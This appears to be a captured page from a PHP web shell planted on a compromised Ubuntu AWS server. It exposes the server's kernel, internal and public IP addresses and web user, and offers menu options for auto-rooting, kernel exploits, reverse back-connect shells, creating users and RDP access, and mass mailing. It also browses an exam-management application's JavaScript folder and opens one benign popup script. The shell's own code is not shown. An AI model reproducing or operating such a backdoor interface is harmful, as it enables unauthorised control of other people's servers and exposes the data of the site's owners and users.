Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.137.170.38
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
custom_js_old /
[ HOME SHELL ]
Name
Size
Permission
Action
OnloadModule.js
639
B
-rwxr-xr-x
PasswordPopup.js
1.02
KB
-rwxr-xr-x
PreMultipleSaveValidation.js
306
B
-rwxr-xr-x
PreSaveModuleValidation.js
362
B
-rwxr-xr-x
batch_close.js
7.59
KB
-rwxr-xr-x
batch_setup.js
9.63
KB
-rwxr-xr-x
dash_board.js
616
B
-rwxr-xr-x
deviation_report.js
1.02
KB
-rwxr-xr-x
download_upload_mannual.js
2.04
KB
-rwxr-xr-x
evaluation.js
16.5
KB
-rwxr-xr-x
evaluationreport.js
711
B
-rwxr-xr-x
freeze_marks.js
2.89
KB
-rwxr-xr-x
gandhiGridValidation.js
310
B
-rwxr-xr-x
include_js.js
5
B
-rwxr-xr-x
marks_deviation_report.js
1.11
KB
-rwxr-xr-x
month_year.js
1.52
KB
-rwxr-xr-x
postSaveSchemaGroupDetails.js
265
B
-rwxr-xr-x
practical_entry_freezing.js
13.45
KB
-rwxr-xr-x
practical_entry_freezing_new.j...
13.32
KB
-rwxr-xr-x
practical_marks.js
9.53
KB
-rwxr-xr-x
practical_marks_mis.js
17.38
KB
-rwxr-xr-x
practical_report_popups.js
3.49
KB
-rwxr-xr-x
preCustomGridEditValidation.js
361
B
-rwxr-xr-x
report_setup.js
21.89
KB
-rwxr-xr-x
report_setup_popup.js
4.58
KB
-rwxr-xr-x
revaluation_report.js
527
B
-rwxr-xr-x
user_report.js
5.3
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : practical_report_popups.js
function GenerateBatchSetupPopup() { var win_width = window.screen.width; $("#batch_dialog").dialog("open"); $("#batch_dialog").data("width.dialog", 400); $("#batch_dialog").data("position.dialog", [(win_width - 400) / 2, 90]); $("#ui-dialog-title-batch_dialog").html("Batch Setup Popup"); var path = "../html_modules/batch_setup_popup.html"; $("#batch_dialog").load(path, function() {}); } function GenerateWorkSheetPopup() { var win_width = window.screen.width; $("#batch_dialog").dialog("open"); $("#batch_dialog").data("width.dialog", 400); $("#batch_dialog").data("position.dialog", [(win_width - 400) / 2, 90]); $("#ui-dialog-title-batch_dialog").html("Work Sheet Setup"); var path = "../html_modules/batch_setup_work_sheet.html"; $("#batch_dialog").load(path, function() { //$("#from_batch").val(trim($("#batch_sub_final_subcode").val())); // $("#to_batch").val(trim($("#batch_sub_final_subcode").val())); }); } function GenerateAdmissionTicketstatus() { console.log("it is comeing"); var win_width = window.screen.width; $("#batch_dialog").dialog("open"); $("#batch_dialog").data("width.dialog", 400); $("#batch_dialog").data("position.dialog", [(win_width - 400) / 2, 90]); $("#ui-dialog-title-batch_dialog").html("Hall Ticket Download Status"); var path = "../html_modules/htstatus.html"; $("#batch_dialog").load(path, function() {}); } function GenerateBatchDairy() { var win_width = window.screen.width; $("#batch_dialog").dialog("open"); $("#batch_dialog").data("width.dialog", 400); $("#batch_dialog").data("position.dialog", [(win_width - 400) / 2, 90]); $("#ui-dialog-title-batch_dialog").html("Work Sheet Setup"); var path = "../html_modules/batch_setup_work_sheet.html"; $("#batch_dialog").load(path, function() { //$("#from_batch").val(trim($("#batch_sub_final_subcode").val())); // $("#to_batch").val(trim($("#batch_sub_final_subcode").val())); }); } function GenerateBatchSetupPopupDetails() { //alert(document.getElementById('module_name_for_save').value); switch (document.getElementById("module_name_for_save").value) { case "SaveBatchSetup": GenerateFromBatchPrepration(); break; case "SavePracticalEntryFreezing": GenerateFromBatchBatchTimeTable(); break; case "bacthpreparation": GenerateBatchpreparationDairy(); break; } } function GenerateBatchWorkSheets() { //alert(document.getElementById('module_name_for_save').value); switch (document.getElementById("module_name_for_save").value) { case "SaveBatchSetup": GenerateBatchWorkSheetsFromBatchPreparation(); break; case "SavePracticalEntryFreezing": GenerateBatchWorkSheetsFromBatchTimeTable(); break; case "bacthpreparation": GenerateBatchpreparationDairy(); break; } } function GenerateAttendanceSheetPopup() { var win_width = window.screen.width; $("#batch_dialog").dialog("open"); $("#batch_dialog").data("width.dialog", 400); $("#batch_dialog").data("position.dialog", [(win_width - 400) / 2, 90]); $("#ui-dialog-title-batch_dialog").html("Attendance Sheet"); var path = "../html_modules/batch_setup_attendance_sheet.html"; $("#batch_dialog").load(path, function() { //$("#from_batch").val(trim($("#batch_sub_final_subcode").val())); // $("#to_batch").val(trim($("#batch_sub_final_subcode").val())); }); } function GenerateAttendanceSheet() { GenerateAttendanceSheetPreparation(); }
Close